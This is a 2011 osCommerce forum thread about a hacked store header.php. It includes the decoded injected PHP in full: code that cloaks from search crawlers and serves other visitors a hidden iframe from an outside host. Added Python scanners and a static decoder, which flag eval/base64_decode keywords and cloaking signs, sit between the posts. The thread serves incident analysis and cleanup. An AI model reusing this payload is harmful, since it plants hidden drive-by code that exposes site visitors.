racerxx Posted February 12, 2011

All of a sudden when I try to browse to my store catalog, I am getting the following error message:

Parse error: syntax error, unexpected '<' in /home/xxxxxxxx/public_html/catalog/includes/header.php on line 1

If I refresh the page, I then get the following error message:

Fatal error: Call to a member function add_current_page() on a non-object in /home/xxxxxxx/public_html/catalog/includes/application_top.php on line 312

My catalog has been working fine for several months and then two days ago this problem started. I'm pretty new to osCommerce and just not sure how to go about fixing this problem.
Guest Posted February 12, 2011

Troy,

Download and open the header.php file in your text editor. Look on line one for the < that is causing the problem. I am going to guess that if you did not make changes to the website, then you have been hacked. In which case you will need to clean the entire site, apply the security patches and security contributions to secure it. The other error will correct itself.

Chris
racerxx (Author) Posted February 12, 2011

Chris,

Thanks for the reply. Here are the first few lines of catalog/includes/header.php

<?php
/*
  $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2003 osCommerce

  Released under the GNU General Public License
*/

// check if the 'install' directory exists, and warn of its existence
  if (WARN_INSTALL_EXISTENCE == 'true') {
    if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {
      $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');
    }
  }

// check if the configure.php file is writeable
  if (WARN_CONFIG_WRITEABLE == 'true') {
    if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {
      $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning');
    }
  }
racerxx (Author) Posted February 12, 2011

I guess it doesn't like something in the first <?php tag?

<?php
/*
  $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright (c) 2003 osCommerce

  Released under the GNU General Public License
*/

// check if the 'install' directory exists, and warn of its existence
  if (WARN_INSTALL_EXISTENCE == 'true') {
    if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {
      $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');
    }
  }

// check if the configure.php file is writeable
  if (WARN_CONFIG_WRITEABLE == 'true') {
    if ( (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) && (is_writeable(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/includes/configure.php')) ) {
      $messageStack->add('header', WARNING_CONFIG_FILE_WRITEABLE, 'warning');
    }
  }

// check if the session folder is writeable
  if (WARN_SESSION_DIRECTORY_NOT_WRITEABLE == 'true') {
    if (STORE_SESSIONS == '') {
      if (!is_dir(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NON_EXISTENT, 'warning');
      } elseif (!is_writeable(tep_session_save_path())) {
        $messageStack->add('header', WARNING_SESSION_DIRECTORY_NOT_WRITEABLE, 'warning');
      }
    }
  }

// check session.auto_start is disabled
  if ( (function_exists('ini_get')) && (WARN_SESSION_AUTO_START == 'true') ) {
    if (ini_get('session.auto_start') == '1') {
      $messageStack->add('header', WARNING_SESSION_AUTO_START, 'warning');
    }
  }

  if ( (WARN_DOWNLOAD_DIRECTORY_NOT_READABLE == 'true') && (DOWNLOAD_ENABLED == 'true') ) {
    if (!is_dir(DIR_FS_DOWNLOAD)) {
      $messageStack->add('header', WARNING_DOWNLOAD_DIRECTORY_NON_EXISTENT, 'warning');
    }
  }

  if ($messageStack->size('header') > 0) {
    echo $messageStack->output('header');
  }
?>
Guest Posted February 12, 2011

Troy,

I really don't see a problem with the file from what you have provided. Ensure there is no whitespace before the <?php tag. Other than that, I am not sure what the problem could be.

Chris
germ Posted February 12, 2011

Since there's nothing in that file to cause the error, I'd guess you didn't download the file from the server before posting.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.
"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -
"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help
racerxx (Author) Posted February 12, 2011

Well, you both were right. It turns out I wasn't logging into the server with the correct username and I didn't know I wasn't looking at the same files on the server. I was looking at another copy of the website and not the live version. No wonder I was about to pull my hair out!

Yes, there turned out to be a whole lot of junk at the top of header.php, so after replacing the file with a backup copy everything works again. I'm not sure if that page was "hacked" or Dreamweaver somehow corrupted it? DW did become disconnected from the site yesterday and I did have to reconfigure DW. That's when I used the wrong username.

Thanks for your help!

Troy
germ Posted February 13, 2011

If the "junk" contained ANY of these PHP keywords the page was hacked:

eval or gzinflate or base64_decode

If any of those were present I'd be checking the ENTIRE site with a fine-toothed comb. :blush:

If it all was just "gobbledygook" (unreadable text) your explanation will suffice. :)
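Checking the entire site for the keywords germ lists is something to script rather than eyeball. The following is an added example and not code from the thread or from osCommerce: it walks a tree of .php files, reports every line containing eval, gzinflate or base64_decode, and also flags the symptom from the opening post (anything ahead of the first <?php tag, which is what produces "unexpected '<' ... on line 1"). The indicator list, the file names and both sample files are constructed for the demo; legitimate code can call base64_decode, so each hit is a lead to review, not a verdict.

```python
import os
import re
import tempfile

# Indicators named in the thread (eval / gzinflate / base64_decode). Legitimate
# code can use base64_decode too, so every hit is a lead for manual review,
# not proof of compromise. The pattern list is my choice, not osCommerce's.
INDICATOR_PATTERNS = [
    ("eval", re.compile(r"\beval\s*\(", re.I)),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(", re.I)),
    ("gzinflate", re.compile(r"\bgzinflate\s*\(", re.I)),
]

# Constructed samples. INFECTED_SAMPLE mirrors the shape racerxx posted
# (stray "<?" tags before "<?php", then stacked eval(base64_decode(...)) calls)
# with a harmless placeholder blob; CLEAN_SAMPLE is the start of a stock header.php.
INFECTED_SAMPLE = (
    "<?<?<?<?<?php eval(base64_decode('QUJD')); eval(base64_decode('QUJD'));\n"
)
CLEAN_SAMPLE = """<?php
/*
  $Id: header.php,v 1.42 2003/06/10 18:20:38 hpdl Exp $
  osCommerce, Open Source E-Commerce Solutions
*/
  if (WARN_INSTALL_EXISTENCE == 'true') {
    if (file_exists(dirname($HTTP_SERVER_VARS['SCRIPT_FILENAME']) . '/install')) {
      $messageStack->add('header', WARNING_INSTALL_DIRECTORY_EXISTS, 'warning');
    }
  }
"""


def scan_php_source(text):
    """Return [(line_no, indicator), ...] for one file's contents.

    Non-whitespace ahead of the first "<?php" is the parse-error symptom from
    the opening post; plain whitespace there is flagged separately because it
    is the "headers already sent" trap Chris warns about.
    """
    findings = []
    head = text[:512]
    tag = head.find("<?php")
    if tag > 0:
        prefix = head[:tag].replace("\ufeff", "")  # a UTF-8 BOM alone is tolerated
        if prefix.strip():
            findings.append((1, "junk before <?php"))
        elif prefix:
            findings.append((1, "whitespace before <?php"))
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATOR_PATTERNS:
            if pattern.search(line):
                findings.append((line_no, name))
    return findings


def scan_tree(root):
    """Walk root and map each .php file that has findings to its findings list."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fname)
            # latin-1 never fails to decode, so binary-looking junk is still scanned
            with open(path, encoding="latin-1") as fh:
                findings = scan_php_source(fh.read())
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


def demo_scan():
    """Write the two constructed samples into a temp tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        inc = os.path.join(root, "catalog", "includes")
        os.makedirs(inc)
        with open(os.path.join(inc, "header.php"), "w") as fh:
            fh.write(INFECTED_SAMPLE)
        with open(os.path.join(inc, "footer.php"), "w") as fh:
            fh.write(CLEAN_SAMPLE)
        return scan_tree(root)


if __name__ == "__main__":
    for path, findings in demo_scan().items():
        for line_no, name in findings:
            print(f"{path}:{line_no}: {name}")
```

Run it against a copy of the live document root (the thread shows why it must be the live copy, not a stale local one), then compare every flagged file against a known-good backup before deciding whether to restore it.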
racerxx (Author) Posted February 13, 2011

I guess it looks like I was "hacked":

<?<?<?<?<?php
eval(base64_decode('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'));
eval(base64_decode('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'));
eval(base64_decode('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'));
eval(base64_decode('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'));

I guess I need to do some reading.
germ Posted February 13, 2011

Tips at the link below:

How to Secure Your Site

If your admin isn't protected by a .htaccess file chances are you're suffering from the "admin vulnerability". I can't be for sure without your URL.

If it's any consolation it was a relatively benign hack. Probably all it did was place spam links on the pages when spiders crawled the site. If you look at your page source in the g00gle cache you'll see what I mean.

The "junk" decodes to this:

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
  array("216.239.32.0","216.239.63.255"),
  array("64.68.80.0" ,"64.68.87.255" ),
  array("66.102.0.0", "66.102.15.255"),
  array("64.233.160.0","64.233.191.255"),
  array("66.249.64.0", "66.249.95.255"),
  array("72.14.192.0", "72.14.255.255"),
  array("209.85.128.0","209.85.255.255"),
  array("198.108.100.192","198.108.100.207"),
  array("173.194.0.0","173.194.255.255"),
  array("216.33.229.144","216.33.229.151"),
  array("216.33.229.160","216.33.229.167"),
  array("209.185.108.128","209.185.108.255"),
  array("216.109.75.80","216.109.75.95"),
  array("64.68.88.0","64.68.95.255"),
  array("64.68.64.64","64.68.64.127"),
  array("64.41.221.192","64.41.221.207"),
  array("74.125.0.0","74.125.255.255"),
  array("65.52.0.0","65.55.255.255"),
  array("74.6.0.0","74.6.255.255"),
  array("67.195.0.0","67.195.255.255"),
  array("72.30.0.0","72.30.255.255"),
  array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
  $first_d=sprintf("%u",ip2long($IPs[0]));
  $second_d=sprintf("%u",ip2long($IPs[1]));
  if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
  if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
  echo '<iframe src="http://hndfdfnfdnxdnf.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
}
germ Posted February 13, 2011

If "stupid" hurt I'd be in a lot of pain right about now.... :blush:

My previous assessment of the code is totally wrong.

The code inserts an <iframe> into the page if the page is NOT being crawled by a spider. That way their nefarious purposes are fulfilled and your site doesn't get blacklisted.

A year or two ago there were a lot of osC sites that if you looked at their cache in g00gle hundreds of spam links appeared. Looking at the site normally with a browser showed no links. Again the hackers' inadmirable purposes are fulfilled and you are none the wiser. The spam was inserted on the page only if you were a crawler, and most people don't bother to check their page source in the g00gle cache.

I always wanted to see that code but as far as I know no one ever posted it. I thought you had found my "Holy Grail".

This is what I get (appearing like the north end of a southbound mule) for reading code before I've had my morning coffee. :lol:
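germ got from the stacked eval(base64_decode(...)) calls to readable PHP by decoding the blobs rather than running them, and that is the safe way to do it on any infected file. The following is an added example, not code from the thread or from osCommerce: it statically peels nested eval() wrappers (base64_decode, gzinflate, gzuncompress, str_rot13) without ever executing the decoded PHP, then checks the final payload for the cloaking behaviours germ describes (error silencing, IP-range and User-Agent crawler checks, a 1x1 iframe for everyone else). The sample payload, the two-layer wrapper around it and the placeholder iframe host are constructed for the demo; only the 66.249.64.0 range is taken from the decoded code above.

```python
import base64
import codecs
import re
import zlib

# Static stand-ins for the PHP decoders that appear inside eval() wrappers.
# Each one undoes an encoding step; none of them runs the decoded PHP.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP's gzinflate()
    "gzuncompress": lambda b: zlib.decompress(b),     # zlib-wrapped, like PHP's gzuncompress()
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}

# eval(f1(f2(...('literal')...)));  -> chain of decoder names plus the quoted blob
EVAL_WRAPPER = re.compile(
    r"\beval\s*\(\s*(?P<chain>(?:\w+\s*\(\s*)+)(?P<q>['\"])(?P<blob>.*?)(?P=q)\s*\)+\s*;?",
    re.S,
)

# Behaviours germ describes in the decoded payload: errors silenced, visitor
# classified as crawler by IP range or User-Agent, hidden 1x1 iframe for everyone else.
CLOAKING_SIGNS = [
    ("silences errors", re.compile(r"error_reporting\s*\(\s*0\s*\)")),
    ("inspects User-Agent", re.compile(r"\$_SERVER\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]")),
    ("compares client IP against ranges", re.compile(r"\bip2long\s*\(")),
    ("crawler keyword list", re.compile(r"['\"](?:bot|spider|crawl|slurp)['\"]", re.I)),
    ("injects hidden iframe", re.compile(r"<iframe[^>]*(?:width|height)=\"?1\"?", re.I)),
]


def unwrap_layer(source):
    """Decode every eval(<decoders>('blob')) in source; None if there is none."""
    pieces = []
    for m in EVAL_WRAPPER.finditer(source):
        data = m.group("blob").encode("latin-1")
        for name in reversed(re.findall(r"\w+", m.group("chain"))):  # innermost call first
            if name not in DECODERS:
                raise ValueError("unsupported decoder in eval() chain: " + name)
            data = DECODERS[name](data)
        pieces.append(data.decode("latin-1"))
    return "\n".join(pieces) if pieces else None


def unwrap_all(source, max_layers=10):
    """Peel nested layers; returns the decoded layers, outermost first."""
    layers = []
    while len(layers) < max_layers:
        decoded = unwrap_layer(source)
        if decoded is None:
            break
        layers.append(decoded)
        source = decoded
    return layers


def analyze(source):
    """Summarise a suspect file: layers peeled, final payload, cloaking signs found."""
    layers = unwrap_all(source)
    payload = layers[-1] if layers else source
    return {
        "layers": len(layers),
        "payload": payload,
        "indicators": [label for label, pat in CLOAKING_SIGNS if pat.search(payload)],
    }


# Constructed stand-in for the payload germ decoded: same structure, one of the
# same public crawler ranges, and a placeholder host in place of the real one.
SAMPLE_PAYLOAD = r"""error_reporting(0);
$bot = FALSE;
$user_agent_to_filter = array('bot','spider','crawl','slurp');
$stop_ips_masks = array(array("66.249.64.0", "66.249.95.255"));
$my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $IPs) {
  if ($my_ip2long >= sprintf("%u", ip2long($IPs[0])) && $my_ip2long <= sprintf("%u", ip2long($IPs[1]))) { $bot = TRUE; break; }
}
foreach ($user_agent_to_filter as $bot_sign) {
  if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false) { $bot = TRUE; break; }
}
if (!$bot) { echo '<iframe src="http://PLACEHOLDER.invalid/x" width="1" height="1"></iframe>'; }
"""


def build_sample_infected_header():
    """Constructed test input: SAMPLE_PAYLOAD wrapped in two eval() layers."""
    inner = "eval(base64_decode('%s'));" % base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    deflater = zlib.compressobj(wbits=-15)  # raw DEFLATE so PHP's gzinflate() would accept it
    deflated = deflater.compress(inner.encode()) + deflater.flush()
    outer = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(deflated).decode()
    return "<?<?<?php " + outer + "\n/* the real header.php would follow here */\n"


if __name__ == "__main__":
    result = analyze(build_sample_infected_header())
    print("layers peeled:", result["layers"])
    print("cloaking indicators:", ", ".join(result["indicators"]))
    print(result["payload"])
```

Because nothing is executed, this is safe to run on a copy of any suspect file; a chain using a decoder the table does not know raises instead of guessing, which is the point at which to read the wrapper by hand. The cloaking check also explains why germ's first reading and a normal browser visit disagree: the page looks clean to the site owner precisely because the payload serves the iframe only to visitors it does not classify as crawlers.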